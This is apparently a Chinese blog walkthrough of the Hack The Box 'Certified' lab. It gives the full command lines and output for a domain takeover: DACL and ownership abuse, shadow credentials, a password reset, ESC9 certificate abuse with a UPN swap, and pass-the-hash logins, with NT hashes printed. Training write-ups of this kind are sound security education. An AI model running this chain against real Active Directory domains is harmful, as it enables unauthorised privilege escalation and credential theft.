lvzhouhang

HTB-Certified

  • ~16.46K 字
  1. 1. 信息搜集
    1. 1.1. smb
    2. 1.2. BloodHound
  2. 2. DACL (Discretionary Access Control List) Attack
  3. 3. ESC9

靶机给了用户名和密码

Username: judith.mader Password: judith09

信息搜集

先扫一下端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# nmap $ip -sC -sV --min-rate=1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-28 07:49 UTC
Stats: 0:00:42 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 91.67% done; ETC: 07:50 (0:00:04 remaining)
Nmap scan report for certified.htb (10.10.11.41)
Host is up (0.072s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-09-28 14:23:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-28T14:25:01+00:00; +6h33m40s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-28T14:25:02+00:00; +6h33m40s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
|_ssl-date: 2025-09-28T14:25:01+00:00; +6h33m40s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC01.certified.htb, DNS:certified.htb, DNS:CERTIFIED
| Not valid before: 2025-06-11T21:04:20
|_Not valid after:  2105-05-23T21:04:20
|_ssl-date: 2025-09-28T14:25:02+00:00; +6h33m40s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-09-28T14:24:21
|_  start_date: N/A
|_clock-skew: mean: 6h33m39s, deviation: 0s, median: 6h33m39s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.45 seconds

DC01.certified.htbcertified.htb添加进hosts里

smb

给的账号和密码可以登录smb

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# nxc smb $ip -u "judith.mader" -p 'judith09' --shares
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09
SMB         10.10.11.41     445    DC01             [*] Enumerated shares
SMB         10.10.11.41     445    DC01             Share           Permissions     Remark
SMB         10.10.11.41     445    DC01             -----           -----------     ------
SMB         10.10.11.41     445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.41     445    DC01             C$                              Default share
SMB         10.10.11.41     445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.41     445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.41     445    DC01             SYSVOL          READ            Logon server share

但是没有可以利用的,枚举一下用户名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# nxc smb $ip -u "judith.mader" -p 'judith09' --users
SMB         10.10.11.41     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.41     445    DC01             [+] certified.htb\judith.mader:judith09
SMB         10.10.11.41     445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-
SMB         10.10.11.41     445    DC01             Administrator                 2024-05-13 14:53:16 0       Built-in account for administering the computer/domain
SMB         10.10.11.41     445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain
SMB         10.10.11.41     445    DC01             krbtgt                        2024-05-13 15:02:51 0       Key Distribution Center Service Account
SMB         10.10.11.41     445    DC01             judith.mader                  2024-05-14 19:22:11 0
SMB         10.10.11.41     445    DC01             management_svc                2024-05-13 15:30:51 0
SMB         10.10.11.41     445    DC01             ca_operator                   2024-05-13 15:32:03 0
SMB         10.10.11.41     445    DC01             alexander.huges               2024-05-14 16:39:08 0
SMB         10.10.11.41     445    DC01             harry.wilson                  2024-05-14 16:39:37 0
SMB         10.10.11.41     445    DC01             gregory.cameron               2024-05-14 16:40:05 0
SMB         10.10.11.41     445    DC01             [*] Enumerated 9 local users: CERTIFIED

将用户名提取出来

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# awk '{print $5}' user|grep '^[a-zA-Z].*'>username
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# cat username
Administrator
Guest
krbtgt
judith.mader
management_svc
ca_operator
alexander.huges
harry.wilson
gregory.cameron

BloodHound

对域内信息进行搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# bloodhound-python -d certified.htb -ns $ip -u "judith.mader" -p 'judith09' -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: certified.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.certified.htb
INFO: Found 10 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.certified.htb
INFO: Done in 00M 14S
INFO: Compressing output into 20250928075835_bloodhound.zip

可以看到judith.mader对management这个组有WriteOwner权限

management组对management_svc具有GenericWrite权限

management_svc用户对ca_operator用户具有GenericAll权限

最后我们可以控制到ca_operator用户

DACL (Discretionary Access Control List) Attack

首先需要先将management组的所有者更改为judith.mader,然后再给judith.mader权限(WriteMembers或者FullControl权限),最后将judith.mader添加进组里

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# bloodyAD -d certified.htb -u "judith.mader" -p 'judith09' --host $ip set owner management judith.mader
[+] Old owner S-1-5-21-729746778-2675978091-3820388244-512 is now replaced by judith.mader on management
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# impacket-dacledit -action write -rights 'FullControl' -principal judith.mader -target Management -dc-ip $ip 'certified.htb'/'judith.mader':'judith09'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20250928-081023.bak
[*] DACL modified successfully!
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# net rpc group addmem Management judith.mader -U "certified.htb"/"judith.mader"%"judith09" -S 10.10.11.41

┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─#  net rpc group members Management -U "certified.htb"/"judith.mader"%"judith09" -S 10.10.11.41
CERTIFIED\judith.mader
CERTIFIED\management_sv

添加进组的命令也可以用bloodAD

1
bloodyAD --host dc01.certified.htb -d certified.htb -u judith.mader -p 'judith09' add groupMember 'management' 'judith.mader'

然后可以添加影子证书获得management_sv的NTLM了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# certipy-ad shadow auto -username judith.mader@certified.htb -password judith09 -account management_svc -target certified.htb -dc-ip 10.10.11.41
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The resolution lifetime expired after 5.404 seconds: Server Do53:10.10.11.41@53 answered The DNS operation timed out.; Server Do53:10.10.11.41@53 answered The DNS operation timed out.; Server Do53:10.10.11.41@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '77559f8d-a8d4-bc5d-39f7-b80467aba907'
[*] Adding Key Credential with device ID '77559f8d-a8d4-bc5d-39f7-b80467aba907' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '77559f8d-a8d4-bc5d-39f7-b80467aba907' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'management_svc@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'management_svc.ccache'
[*] Wrote credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584

可以看到management_svc是属于REMOTE MANAGEMENT USERS组的,所以可以远程登陆

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# evil-winrm -i $ip -u 'management_svc' --hash 'a091c1832bcdd4677c28b5a6a1295584'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents>

management_svc用户对ca_operator用户具有GenericAll权限,所以我们直接修改ca_operator的密码就行

1
2
*Evil-WinRM* PS C:\Users\management_svc\Documents> net user ca_operator Asd123123.
The command completed successfully.

用ca_operator的用户找一下是否存在有漏洞的证书模板

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# certipy-ad find -dc-ip $ip -u 'ca_operator' -p 'Asd123123.' -vulnerable  -stdout
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
。。。。。
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Full Control Principals         : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFIED.HTB\operator ca
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

存在ESC9

ESC9

首先要用management_svc账号将ca_operator的userPrincipalName改为administrator

1
2
3
4
5
6
7
8
9
10
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_o
perator -upn Administrator
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: The DNS query name does not exist: CERTIFIED.HTB.
[!] Use -debug to print a stacktrace
[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

然后请求ESC9证书

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# certipy-ad req -username ca_operator@certified.htb -p 'Asd123123.' -dc-ip $ip -ca certified-DC01-CA -template CertifiedAuthentication
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

然后将ca_operator的userPrincipalName还原为ca_operator@certified.htb

1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# certipy-ad account update -u management_svc -hashes :a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_oper
ator@certified.htb -dc-ip 10.10.11.41
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'

最后使用证书验证身份登录并接受NTML

1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.41 -domain certified.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/Desktop/tmp/baji]
└─# evil-winrm -i $ip -u 'administrator' --hash 0d5b49608bbce1751f708748f67e2d34

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
本作品采用 知识共享署名-相同方式共享 4.0 国际许可协议 进行许可
赞助喵
非常感谢您的喜欢!
赞助喵
分享这一刻
让朋友们也来瞅瞅!